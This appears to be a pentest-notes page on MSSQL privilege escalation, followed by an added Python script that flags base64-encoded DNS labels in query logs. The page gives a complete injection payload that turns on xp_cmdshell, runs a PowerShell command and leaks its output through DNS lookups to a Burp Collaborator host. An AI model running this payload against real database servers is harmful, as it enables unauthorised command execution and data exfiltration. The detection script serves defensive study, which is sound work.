Privilege Escalation - MSSQL
MSSQL Privilege Escalation

Blind RCE via OOB SQL Injection

The following command enables xp_cmdshell, executes a simple PowerShell command, and returns the output of that command inside a DNS request.

random';EXEC sp_configure 'show advanced options', 1; EXEC sp_configure 'xp_cmdshell', 1; reconfigure with override; exec master..xp_cmdshell 'powershell $cmd=whoami;  $enc=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($cmd)).trim(''=''); ping -n 1 $enc''.mysubdomainhere.burpcollaborator.net'' '-- -

If successful, in Collaborator you will see:

[screenshot: burp_collaborator]
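A defender-side check for the DNS exfiltration described above, added here as an example and not part of the original repository: it scans DNS query log lines and tries to decode the leftmost label as base64, re-padding it first because the payload strips the `=` padding before sending. The log line format, the constructed sample label and the 8-character minimum are assumptions for this example.

```python
import base64
import binascii
import re
import string
from typing import List, Optional, Tuple

# Constructed DNS query log, one "<timestamp> <client> <qtype> <qname>" per line.
# Line 1 carries the kind of label the xp_cmdshell -> powershell -> ping chain on
# this page produces: base64 output with its '=' padding stripped. The rest are benign.
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 A d2luMjAxOVxzcWxzdmM.mysubdomainhere.burpcollaborator.net
2024-05-01T10:00:02Z 10.0.0.5 A www.example.com
2024-05-01T10:00:03Z 10.0.0.7 AAAA updates.example.com
"""

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>\S+)\s+(?P<qname>\S+)$")
MIN_LABEL_LEN = 8  # assumed threshold: short labels such as www or mail decode to noise

Finding = Tuple[str, str, str, str]  # (timestamp, client, qname, decoded text)


def decode_stripped_base64(label: str) -> Optional[str]:
    """Re-pad a label whose '=' padding was removed and decode it.
    Returns the text only if it is printable; anything else yields None."""
    if len(label) < MIN_LABEL_LEN:
        return None
    padded = label + "=" * (-len(label) % 4)  # restore the padding trim('=') removed
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not text or any(ch not in string.printable for ch in text):
        return None
    return text


def scan_dns_log(log_text: str) -> List[Finding]:
    """Flag every query whose leftmost label decodes to printable base64 text."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        first_label = m["qname"].split(".", 1)[0]
        decoded = decode_stripped_base64(first_label)
        if decoded is not None:
            findings.append((m["ts"], m["client"], m["qname"], decoded))
    return findings
```

This is a heuristic: legitimate long hostnames can occasionally decode to printable text, so findings should be reviewed alongside the SQL Server audit trail for sp_configure changes to xp_cmdshell.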

Reference

https://github.com/man1pulator/pentest_diary